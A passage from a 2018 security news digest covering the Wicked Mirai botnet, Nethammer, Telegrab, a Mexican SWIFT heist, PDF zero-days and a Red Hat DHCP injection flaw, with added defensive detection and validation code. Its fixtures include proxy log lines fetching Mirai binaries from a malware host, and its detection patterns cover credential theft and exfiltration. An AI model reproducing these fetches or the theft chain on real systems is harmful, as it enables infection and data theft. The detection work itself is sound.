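2018-05-17T10:00:01Z 203.0.113.10 198.51.100.1 8080 S
2018-05-17T10:00:01Z 203.0.113.10 198.51.100.2 8080 S
2018-05-17T10:00:01Z 203.0.113.10 198.51.100.3 81 S
2018-05-17T10:00:02Z 203.0.113.10 198.51.100.4 8443 S
2018-05-17T10:00:02Z 203.0.113.10 198.51.100.5 80 S
2018-05-17T10:00:02Z 203.0.113.10 198.51.100.6 8080 S
2018-05-17T10:00:03Z 203.0.113.10 198.51.100.7 81 S
2018-05-17T10:00:05Z 192.0.2.55 198.51.100.1 443 SA
2018-05-17T10:00:06Z 192.0.2.55 198.51.100.1 443 A
2018-05-17T10:00:07Z 192.0.2.77 198.51.100.9 22 S
"""

# Constructed proxy log (not real traffic): ts src method url
SAMPLE_PROXY_LOG = """\
2018-05-17T10:00:09Z 198.51.100.2 GET http://185.246.152.173/exploit/owari.mips
2018-05-17T10:00:10Z 198.51.100.8 GET http://www.example.org/index.html
2018-05-17T10:00:11Z 198.51.100.5 GET http://185.246.152.173/bins/omni.arm7
"""

FW_LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\S+)$")


def parse_fw(text):
    """Yield (ts, src, dst, dport, flags) for each well-formed firewall line."""
    for line in text.splitlines():
        m = FW_LINE_RE.match(line.strip())
        if m:
            ts, src, dst, dport, flags = m.groups()
            yield ts, src, dst, int(dport), flags


def find_wicked_scanners(text, min_targets=5):
    """Sources sending bare SYNs to at least min_targets distinct hosts, where every
    probed port lies in the Wicked set. The four ports are ordinary web ports, so the
    SYN-only fan-out across hosts is what separates the sweep from client traffic."""
    targets = defaultdict(set)
    ports = defaultdict(set)
    for _, src, dst, dport, flags in parse_fw(text):
        if flags == "S":
            targets[src].add(dst)
            ports[src].add(dport)
    return sorted(
        src for src in targets
        if len(targets[src]) >= min_targets and ports[src] <= WICKED_SCAN_PORTS
    )


def find_payload_fetches(text):
    """(client, url) for hosts that fetched a stage-two binary from the distribution
    server; these are devices that were already exploited, whichever port was used."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and PAYLOAD_RE.match(parts[3]):
            hits.append((parts[1], parts[3]))
    return hits


if __name__ == "__main__":
    print("scanners:", find_wicked_scanners(SAMPLE_FW_LOG))
    print("exploited:", find_payload_fetches(SAMPLE_PROXY_LOG))
```

The IP-based match is the weaker of the two signals: Fortinet already saw the files on that host change from Owari to Omni within days, and the host itself will eventually move. The scan signature survives that, so it is the one worth keeping as a standing rule, with min_targets tuned to the size of the monitored network.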


Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found an interview with the author of the Owari/Sora IoT botnets dating back to April.

The vxer, who goes by the online handle “Wicked,” said at the time that he had abandoned the Sora botnet and was working on Owari.

The conversation suggests the author has since abandoned both the Sora and Owari bots and is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Update May 19, 2018 – Speaking with MalwareMustDie

I contacted MalwareMustDie for a comment on the Wicked Mirai botnet.

Below are the observations the team shared with me:

  • Same coder.
  • The author put all of the high-possibility exploit code in Mirai
  • GPON seemed to be used in a separate pwn scheme by a different script outside of the Mirai, but is being used to infect with Mirai.

MalwareMustDie researchers told me that they passed the identity of the author to the law enforcement agency (LEA) of the relevant country. They explained that even though they made several reports to the authorities, law enforcement failed to prevent the spread of the malicious code. The experts showed me an official report to the LEA dated January 2018, in which they alerted the authorities to the propagation of new Mirai variants.

“The ID of the actor was passed to the related country LEA from our team, which investigated the result too, since we published the Satori/Okiru variant a while ago, way before the ARC CPU variant was spotted.” MMD told me.

“So by the release of OWARI, SORA, and WICKED, this is what will happen if we let the malware actor run loose unarrested. More damage will be created and they just don’t know how to stop themselves.”

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post Updated – The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.

Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code

The Nethammer attack technique is the first truly remote Rowhammer attack that doesn’t require a single attacker-controlled line of code on the targeted system.

A few days ago security experts announced the first network-based remote Rowhammer attack, dubbed Throwhammer. That attack exploits the known DRAM weakness through network cards that use remote direct memory access (RDMA) channels.

Rowhammer is a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows; this means that, in principle, an attacker can change bits in memory it is not allowed to access.

The issue has been known at least since 2012; the first practical attack was demonstrated in 2015 by white hat hackers at Google’s Project Zero team.

To better understand the Rowhammer flaw, recall that DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to different services and applications, and the system isolates them so that one application cannot access the memory space reserved for another.

The bit flips caused by Rowhammer can be exploited to break out of this isolation.

A separate group of security researchers has now demonstrated another network-based remote Rowhammer attack, dubbed Nethammer, which leverages uncached memory or flush instructions used while processing network requests.

“Nethammer is the first truly remote Rowhammer attack, without a single attacker-controlled line of code on the targeted system. Systems that use uncached memory or flush instructions while handling network requests, e.g., for interaction with the network device, can be attacked using Nethammer” reads the research paper published by the experts.

The research team was composed of academics from Graz University of Technology, the University of Michigan, and Univ Rennes.

The Nethammer technique lets an attacker corrupt memory on the targeted system by making its network stack rapidly read and rewrite the memory used for packet processing; the resulting bit flips can compromise the integrity of the system and, depending on where they land, be turned into control over it.

The attack is feasible only with a fast network connection between the attacker and victim.

“We demonstrate that the frequency of the cache misses is in all three cases high enough to induce bit flips. We evaluated different bit flip scenarios.” continues the paper.
“Depending on the location, the bit flip compromises either the security and integrity of the system and the data of its users, or it can leave persistent damage on the system, i.e., persistent denial of service.”

This process results in a high number of memory accesses to the same set of memory locations, which can induce disturbance errors in DRAM and cause memory corruption by unintentionally flipping DRAM bit values.

The resulting data corruption can be exploited by the attackers to gain control over the victim’s system.

“To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache.” continues the paper.
“An attacker can use the unprivileged clflush instruction to invalidate the cache line or use uncached memory if available.” 

The experts highlighted that caching makes the attack more difficult, so they devised techniques to bypass the cache and reach DRAM directly in order to cause the interference.

The experts successfully demonstrated three different cache bypasses for Nethammer technique:

  • A kernel driver that flushes (and reloads) an address whenever a packet is received.
  • Intel Xeon CPUs with Intel CAT for fast cache eviction
  • Uncached memory on an ARM-based mobile device.

The experts observed a bit flip every 350 ms, demonstrating that it is possible to hammer over the network if at least two memory accesses are served from main memory; they induced the flips by sending a stream of UDP packets at up to 500 Mbit/s to the target system.

Unlike the original Rowhammer attack, the Nethammer technique does not require any attacker code on the target.

Unfortunately, attacks based on Rowhammer cannot be fully mitigated with software patches; solving the issue requires redesigning the affected hardware, and in the meantime threat actors could start exploiting the Rowhammer technique in the wild.

Further details on the Rowhammer attack are reported in my post titled “The Rowhammer: the Evolution of a Dangerous Attack”.

Pierluigi Paganini

(Security Affairs – Nethammer, hacking)

The post Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code appeared first on Security Affairs.

Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files

Cisco Talos researchers have spotted a new variant of Telegrab malware designed to collect information from the Desktop version of the popular messaging service Telegram.

Security experts from Cisco Talos group have spotted a new strain of malware that is targeting the desktop version of end-to-end encrypted instant messaging service Telegram.

Telegram is currently under pressure from Russia’s media watchdog Roskomnadzor, which asked the company for the technical means to access messages exchanged through the app. Last month, the Russian authorities blocked Telegram in the country because the company refused to hand over its users’ encryption keys to the Federal Security Service (FSB) for investigation purposes.

The analysis of the malware revealed, “with high confidence,” that it was developed by a Russian-speaking attacker, and the threat actor is mostly targeting Russian-speaking victims.

The malicious code is a variant of the Telegrab malware that was first spotted in the wild on April 4, 2018; it has been designed to harvest cache and key files from the Telegram application.

A second variant of the Telegrab malware emerged on April 10, 2018; the development team appears very active.

While the first variant of Telegrab only stole text files, browser credentials, and cookies, the second version also collects Telegram’s desktop cache and key files, which can be used to hijack active Telegram sessions, as well as Steam login credentials.

Talos researchers discovered that the malicious code is intentionally avoiding IP addresses related to anonymizer services.

“Over the past month and a half, Talos has seen the emergence of a malware that collects cache and key files from end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10.” reads the blog post published by Cisco Talos.

The researchers identified the author behind this malware with high confidence; he posted several YouTube video tutorials for the Telegrab malware.

The operators of this malware use several hardcoded pcloud.com accounts to store the exfiltrated data. The experts noticed that the stolen information is not encrypted, so anyone with access to these account credentials can read the exfiltrated data.

“Telegram session hijacking is the most interesting feature of this malware, even with limitations this attack does allow the session hijacking and with it, the victims’ contacts and previous chats are compromised,” says the Talos team.

On Windows targets, the malicious code searches the hard drives for Chrome credentials, session cookies, and text files, which are zipped and uploaded to pcloud.com.

Cisco Talos researchers blame “weak default settings” in the Telegram Desktop version: Telegrab abuses the fact that Secret Chats are not implemented on the desktop client and that the session data it keeps on disk can be replayed on another machine.

Cisco Talos experts explained that Telegrab works by restoring the stolen cache and map files into an existing Telegram Desktop installation, provided the session was open on the victim’s machine.

“In summary, by restoring cache and map files into an existing Telegram desktop installation, if the session was open, it will be possible to access the victim’s session, contacts and previous chats.” continues the post.
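The behaviour Talos describes is a short chain on the endpoint: a process that is not Telegram itself reads the Telegram Desktop profile (and, in the same sweep, browser cookies and credentials), packs what it found into an archive, and uploads it to pcloud.com. Any one of those steps is noise on its own (backup tools read tdata, pcloud is a legitimate service), so the detection below keys on the whole chain from a single process. This is an added example, not Talos’s detection content; the telemetry format and the events are constructed, and the path patterns are assumptions about where Telegram Desktop and Chrome keep their data on Windows.

```python
import re
from collections import defaultdict

TDATA_RE = re.compile(r"\\Telegram Desktop\\tdata\\", re.I)          # assumed profile path
CHROME_SECRETS_RE = re.compile(r"\\Chrome\\User Data\\.*\\(Cookies|Login Data)$", re.I)
ARCHIVE_RE = re.compile(r"\.(zip|7z|rar)$", re.I)
EXFIL_HOST_RE = re.compile(r"(^|\.)pcloud\.com$", re.I)               # storage named by Talos
LEGIT_TELEGRAM_IMAGES = {"telegram.exe"}

# Constructed endpoint telemetry (not real EDR output): pid|image|event|target
SAMPLE_EVENTS = r"""
1000|C:\Users\v\AppData\Roaming\Telegram Desktop\Telegram.exe|FileRead|C:\Users\v\AppData\Roaming\Telegram Desktop\tdata\map0
4242|C:\Users\v\Downloads\updater.exe|FileRead|C:\Users\v\AppData\Roaming\Telegram Desktop\tdata\map0
4242|C:\Users\v\Downloads\updater.exe|FileRead|C:\Users\v\AppData\Local\Google\Chrome\User Data\Default\Cookies
4242|C:\Users\v\Downloads\updater.exe|FileCreate|C:\Users\v\AppData\Local\Temp\u1.zip
4242|C:\Users\v\Downloads\updater.exe|NetConnect|api.pcloud.com:443
5150|C:\Program Files\Google\Chrome\chrome.exe|NetConnect|www.example.org:443
6000|C:\Users\v\tools\backup.exe|FileRead|C:\Users\v\AppData\Roaming\Telegram Desktop\tdata\map0
6000|C:\Users\v\tools\backup.exe|FileCreate|D:\backups\profile.zip
"""

REQUIRED_STAGES = {"tdata_read", "archive_created", "pcloud_connect"}


def parse_events(text):
    """Yield (pid, image, event, target) for each non-empty telemetry line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, image, event, target = line.split("|", 3)
        yield int(pid), image, event, target


def score_processes(text):
    """Map pid -> (image, set of Telegrab-like stages seen), skipping Telegram itself."""
    stages = defaultdict(set)
    images = {}
    for pid, image, event, target in parse_events(text):
        images[pid] = image
        if image.rsplit("\\", 1)[-1].lower() in LEGIT_TELEGRAM_IMAGES:
            continue  # the real client reading its own profile is expected
        if event == "FileRead" and TDATA_RE.search(target):
            stages[pid].add("tdata_read")
        elif event == "FileRead" and CHROME_SECRETS_RE.search(target):
            stages[pid].add("browser_secrets_read")
        elif event == "FileCreate" and ARCHIVE_RE.search(target):
            stages[pid].add("archive_created")
        elif event == "NetConnect" and EXFIL_HOST_RE.search(target.rsplit(":", 1)[0]):
            stages[pid].add("pcloud_connect")
    return {pid: (images[pid], stages[pid]) for pid in stages}


def alerts(text):
    """Pids that completed the read -> archive -> upload chain."""
    return sorted(pid for pid, (_, seen) in score_processes(text).items()
                  if REQUIRED_STAGES <= seen)


if __name__ == "__main__":
    scored = score_processes(SAMPLE_EVENTS)
    for pid in alerts(SAMPLE_EVENTS):
        print(f"pid {pid} ({scored[pid][0]}): {sorted(scored[pid][1])}")
```

In the constructed data the backup tool reads tdata and writes an archive but never talks to pcloud, so it does not alert; the downloaded updater completes all three stages and does. Because Talos notes the samples have no persistence, the process that matters is the one the victim ran, so per-process correlation rather than per-host aggregation is the right granularity.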


The analysis of the malware allowed the researchers to link it to a user who goes by the name Racoon Hacker, also known as Eyenot (Енот / Enot) and Racoon Pogoromist (sic).

The Telegrab malware is aimed at surgical operations that fly under the radar and compromise thousands of credentials in a short time.

Operations of this kind are usually not associated with cybercrime gangs that operate on a larger scale. Stolen credentials and cookies allow the malware operator to access the victim’s accounts on social media and email services (e.g. vk.com, yandex.com, gmail.com, google.com), which are a precious source of information for intelligence gathering.

“This malware should be considered a wakeup call to encrypted messaging systems users. Features which are not clearly explained and bad defaults can put in jeopardy their privacy.” conclude the Talos experts.

“When compared with the large bot networks used by large criminal enterprises, this threat can be considered almost insignificant.” 

“The malware samples analysed are not particularly sophisticated but they are efficient. There are no persistence mechanisms, meaning victims execute the malware every time, but not after reboots”.

Pierluigi Paganini

(Security Affairs – Telegrab malware, Telegram)

The post Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files appeared first on Security Affairs.


Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.

The Mexican central bank is the latest victim of the SWIFT hackers; officials at the bank confirmed this week that hackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents.” reported Reuters.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

Mexican central bank cyberheist

According to reports, following the latest cyber attacks Mexico’s central bank has created a cybersecurity division and has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.

Pierluigi Paganini

(Security Affairs – Mexican central bank, SWIFT)


Operation Hotel – Ecuador spent millions on spy operation for Julian Assange

According to The Guardian newspaper, Ecuador spent millions on spy operation for Julian Assange after he hacked the embassy network.

According to a report published by the Guardian, Ecuador spied on WikiLeaks founder Julian Assange at its London embassy, where he has been living under political asylum since 2012.

In 2012 a British judge ruled he should be extradited to Sweden to face allegations of sexual assault there, but Assange maintained that the accusations were political.

“Ecuador bankrolled a multimillion-dollar spy operation to protect and support Julian Assange in its central London embassy, employing an international security company and undercover agents to monitor his visitors, embassy staff and even the British police, according to documents seen by the Guardian.” reads the report published by The Guardian.

“Over more than five years, Ecuador put at least $5m (£3.7m) into a secret intelligence budget that protected the WikiLeaks founder while he had visits from Nigel Farage, members of European nationalist groups and individuals linked to the Kremlin.”

The newspaper revealed that Ecuador spent $5.0 million on the operation, codenamed “Operation Guest” and later “Operation Hotel”, which was approved by the then Ecuadorian president, Rafael Correa, and the then foreign minister, Ricardo Patiño.

Initially, the operation aimed at protecting Assange, but it later became a spying operation on the journalist. From June 2012 to the end of August 2013, Operation Hotel cost Ecuador $972,889, according to documents belonging to the Senain, the Ecuadorian intelligence agency.

The operatives hired by Ecuador monitored Assange’s daily activities and any contact with embassy staff and visitors; they stayed in a rented flat near the embassy at a cost of £2,800 a month.

Julian Assange

“Documents show the intelligence programme, called “Operation Guest”, which later became known as “Operation Hotel” – coupled with parallel covert actions – ran up an average cost of at least $66,000 a month for security, intelligence gathering and counter-intelligence to “protect” one of the world’s most high-profile fugitives.” continues the newspaper.

According to The Guardian, which cited documents it has viewed, Assange hacked the communications system within the embassy, gaining access to staff communications.

“In an extraordinary breach of diplomatic protocol, Assange managed to compromise the communications system within the embassy and had his own satellite internet access, according to documents and a source who wished to remain anonymous.” continues the paper.

“By penetrating the embassy’s firewall, Assange was able to access and intercept the official and personal communications of staff,”

WikiLeaks denied that Assange had hacked the embassy network.

In response, Ecuador has cut off Assange’s internet access in recent months by installing a jammer, and the government has also restricted the number of visitors he can receive.

“Assange claims the accusations were politically motivated and could lead to him being extradited to the United States to face imprisonment over WikiLeaks’ publication of secret US military documents and diplomatic cables in 2010.” reported the AFP agency.

“Ecuador in December made Assange an Ecuadoran citizen and unsuccessfully tried to register him as a diplomat with immunity as part of its efforts to have him leave the embassy without risk of being detained.”

Last year, Sweden dropped its investigation into Assange, but the British authorities still plan to arrest him for breaching his bail conditions.

Pierluigi Paganini

(Security Affairs – Julian Assange, hacking)


Mysterious hackers ingenuously reveal two Zero-Days to security community

Mysterious hackers ingenuously revealed two zero-days to the security community, and experts collaborated to promptly fix them.

Anton Cherepanov, a security researcher at ESET, discovered two zero-days while analyzing a malicious PDF; according to the researcher, the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (two suspicious PDF samples: zero-day 1, zero-day 2). The analysis of the document revealed that it was exploiting two previously unknown vulnerabilities: a remote code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, the Windows Defender ATP research team, and the Adobe Product Security Incident Response Team, which fixed these bugs.

The two zero-days are tracked as CVE-2018-4990, which affects the Adobe Acrobat/Reader PDF viewer, and CVE-2018-8120, which affects the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to execute arbitrary code inside Adobe Acrobat/Reader and escape Adobe’s sandbox protection.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below are the steps composing the attack chain:

  • The victim receives and opens a weaponized PDF file.
  • Once the user opens the PDF, malicious JavaScript code executes.
  • The JavaScript code manipulates a button object.
  • The button object contains a specially crafted JPEG2000 image that triggers a double-free vulnerability in Adobe Acrobat/Reader.
  • The JavaScript code uses heap-spray techniques to obtain read and write memory access.
  • The JavaScript code then interacts with Adobe Reader’s JavaScript engine.
  • The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute their own native shellcode.
  • The shellcode initializes a PE file embedded in the PDF.
  • Once the attacker has exploited the Adobe Reader vulnerability, they leverage the Windows zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privileges of the PE file, which runs in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.
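
As an added example, not ESET’s tooling and not from this post, here is a byte-level triage script that looks for the pieces the chain above is built from: JavaScript wired to run on open, a JPEG2000 image (the /JPXDecode filter) and an embedded PE file. The two PDFs in the block are constructed for the demo, not the real sample. Note the caveat in the code: objects hidden inside compressed streams are invisible to a byte scan, so such a file only ever gets an “inconclusive” verdict that should trigger a second look with a real PDF parser.

```python
import re

# Added triage helper, not ESET's tooling: it flags, in a PDF's raw bytes, the structural
# indicators the ESET write-up names for this sample (embedded JavaScript that drives the
# exploit, a JPEG2000 image decoded with /JPXDecode, an embedded PE file) plus the
# auto-run keys that make the script fire on open. The sample PDFs below are constructed.

# PDF names may be hex-escaped (/J#53 names the same key as /JS), so escapes are resolved
# before matching; otherwise a trivially obfuscated key would be missed.
_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

# Each indicator is a regex over the normalised bytes. The negative look-ahead stops /JS
# from matching longer names, and the PE check wants the DOS 'MZ' stub followed by the
# 'PE\0\0' signature within the header area rather than any stray 'MZ' pair.
INDICATORS = {
    "javascript":  re.compile(rb"/(?:JavaScript|JS)(?![A-Za-z0-9])"),
    "jpeg2000":    re.compile(rb"/JPXDecode(?![A-Za-z0-9])"),
    "auto_action": re.compile(rb"/(?:OpenAction|AA)(?![A-Za-z0-9])"),
    "pe_file":     re.compile(rb"MZ.{0,1024}?PE\x00\x00", re.DOTALL),
}


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes in PDF name objects."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Count each indicator; also count compressed streams this byte-level scan cannot see into."""
    norm = normalize_names(data)
    hits = {label: len(rx.findall(norm)) for label, rx in INDICATORS.items()}
    hits["compressed_streams"] = norm.count(b"/FlateDecode")
    return hits


def verdict(hits: dict) -> str:
    """Turn the counts into a triage verdict; compressed content forces a second look."""
    if hits["javascript"] and (hits["jpeg2000"] or hits["pe_file"]):
        return "suspicious: script plus exploit-style payload"
    if hits["javascript"] and hits["auto_action"]:
        return "suspicious: script runs on open"
    if hits["compressed_streams"] and not any(hits[k] for k in INDICATORS):
        return "inconclusive: inflate compressed streams and rescan"
    return "no indicators"


# Constructed samples: a minimal benign PDF and one carrying the indicators, with the
# JavaScript key hex-escaped and a fake PE header inside a stream. Neither is the real sample.
BENIGN_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

WEAPONIZED_PDF = (
    b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 3 0 R /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /JavaScript /J#53 (app.alert(1)) >> endobj\n"
    b"4 0 obj << /Type /XObject /Subtype /Image /Filter /JPXDecode /Length 4 >>\n"
    b"stream\nABCD\nendstream\nendobj\n"
    b"5 0 obj << /Length 84 >>\nstream\nMZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 16
    + b"\nendstream\nendobj\n%%EOF\n"
)

if __name__ == "__main__":
    for name, pdf in (("benign", BENIGN_PDF), ("weaponized", WEAPONIZED_PDF)):
        print(name, triage_pdf(pdf), verdict(triage_pdf(pdf)))
```

A scan like this is a first filter, not a classifier: legitimate forms use /JavaScript and /AA too, and a real sample may keep every object inside FlateDecode streams, which is why the compressed-stream count is reported alongside the hits rather than ignored.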

Although the chain of zero-days could be very dangerous, the developers allowed the security community to detect it by uploading the sample to a known virus scanning engine, apparently to test its evasion capability.

zero-days exploits

The two zero-days have already been patched: Microsoft addressed CVE-2018-8120 with the release of the May 2018 Patch Tuesday, and Adobe patched CVE-2018-4990 this week.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.

“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Pierluigi Paganini

(Security Affairs – zero-days, hacking)

Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux; the issue also affects other distros based on it, such as Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client application receives network configuration parameters, including IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a PoC for the CVE-2018-1111, in the last screenshot the attacker accesses the shell as root.

Red Hat DHCP client flaw

Wilhelm did not release a PoC exploit code, but he explained that it is so short that it can even fit in a tweet.

According to Wilhelm, an attacker operating a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually running arbitrary commands with root privileges on a victim’s system that runs the vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7, admins should update their packages to the newer versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.
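
An added illustration of the bug class, not the Red Hat/NetworkManager script itself (this post does not reproduce it): a DHCP hook receives option values that the DHCP server fully controls, and the safe handling is to validate them against a strict allow-list and never pass them through eval or a shell string. The DHCP4_NTP_SERVERS variable name follows the naming NetworkManager dispatcher scripts see for DHCP options and is treated here as an assumption; the option values in the checks are constructed.

```python
import re

# Added illustration of the bug class behind CVE-2018-1111, not the Red Hat/NetworkManager
# script itself. A DHCP hook receives option values a rogue DHCP server fully controls (here
# through a DHCP4_* environment variable, the naming NetworkManager dispatcher scripts see;
# treated as an assumption about the environment). Such text must never reach eval, sh -c or
# a shell string; it is checked against a strict allow-list first and then written out as data.

# One hostname (RFC 1123 labels) or an IPv4/IPv6-looking literal. This is a syntax allow-list,
# not a full address validator: its job is to make `;`, quotes, `$(`, backticks and whitespace
# impossible, so nothing the server sends can change what a later shell or parser does.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_TOKEN = re.compile(rf"^(?:{_LABEL}(?:\.{_LABEL})*|[0-9A-Fa-f:]+)$")


class UntrustedOptionError(ValueError):
    """Raised when a DHCP-supplied value contains anything outside the allow-list."""


def parse_server_list(raw: str):
    """Split a space-separated server list as DHCP delivers it and validate every token."""
    servers = []
    for token in raw.split():
        if not _TOKEN.match(token):
            raise UntrustedOptionError(f"rejected DHCP option token: {token!r}")
        servers.append(token)
    return servers


def is_safe_server_list(raw: str) -> bool:
    """Convenience wrapper: True when every token passes, False on the first rejection."""
    try:
        parse_server_list(raw)
        return True
    except UntrustedOptionError:
        return False


def render_ntp_config(env: dict) -> str:
    """Build chrony/ntpd-style 'server' lines from DHCP4_NTP_SERVERS; empty string if unset."""
    raw = env.get("DHCP4_NTP_SERVERS", "")
    return "".join(f"server {server} iburst\n" for server in parse_server_list(raw))


# The pattern to avoid, for contrast only (never run it): building a shell command string
# from the raw value, e.g. subprocess.run(f"echo server {raw} >> /etc/chrony.conf", shell=True),
# lets the shell parse whatever the DHCP server put in the option as commands.

if __name__ == "__main__":
    import os
    print(render_ntp_config(os.environ), end="")
```

The rejection is deliberately all-or-nothing: a value that fails validation is reported and dropped rather than “cleaned”, because stripping a few metacharacters from attacker-controlled text is exactly the kind of partial fix that command injection bugs tend to slip past.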

Below is the full list of affected RHEL versions:

  • Advanced Update Support 6.4
  • Extended Update Support 7.3
  • Advanced Update Support 6.6
  • Red Hat Enterprise Linux 6
  • Extended Update Support 6.7
  • Advanced Update Support 7.2
  • Server TUS (v.6.6)
  • RHEL 7
  • Extended Update Support 7.4
  • Virtualization 4 Management Agent for RHEL 7 Hosts
  • Advanced Update Support 6.5
  • Linux Server TUS (v. 7.2)

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distros such as OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementation does not include the NetworkManager integration script by default.

Pierluigi Paganini

(Security Affairs – CVE-2018-1111, DHCP Client flaw)


Anonymous defaced Russia govt website against Telegram ban

Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.

Anonymous hacked the official website of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo); the cyber attack occurred on May 10th. The popular collective hacked and defaced a subdomain of the site to protest against government censorship, with a specific reference to the ban on Telegram. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over the encryption keys of its users to the Federal Security Service (FSB) of Russia for investigation purposes.

“The website of a government agency tasked with promoting Russia’s image abroad has been hijacked by hackers who posted a message with a threat against the state body involved in a campaign to block a popular messaging app.” reads The Moscow Times.

Since May 3rd, 2018, Russia’s media and communication regulatory authority Roskomnadzor has blocked over 50 virtual private networks (VPNs), web proxies and anonymizing networks.

Anonymous defaced one of the subdomains of Rossotrudnichestvo; the hackers published an NSFW image and several messages against the ongoing government censorship.

“Greetings, Roskomnadzor. Your recent destructive actions against Runet led us to the idea that you are just a handful of incompetent brainless worms. You no longer have to be able to continue this pointless vandalism. Consider this as our last warning. Yours, Anonymous.” reads the message published on the defaced domain.

“That defacement was accompanied by the image of a cartoon character wearing a Roskomnadzor arm patch using a flamethrower on the “internet,” as well as a symbol of Telegram founder Pavel Durov’s “Digital Resistance” which he declared against political censorship.” continues the media outlet.
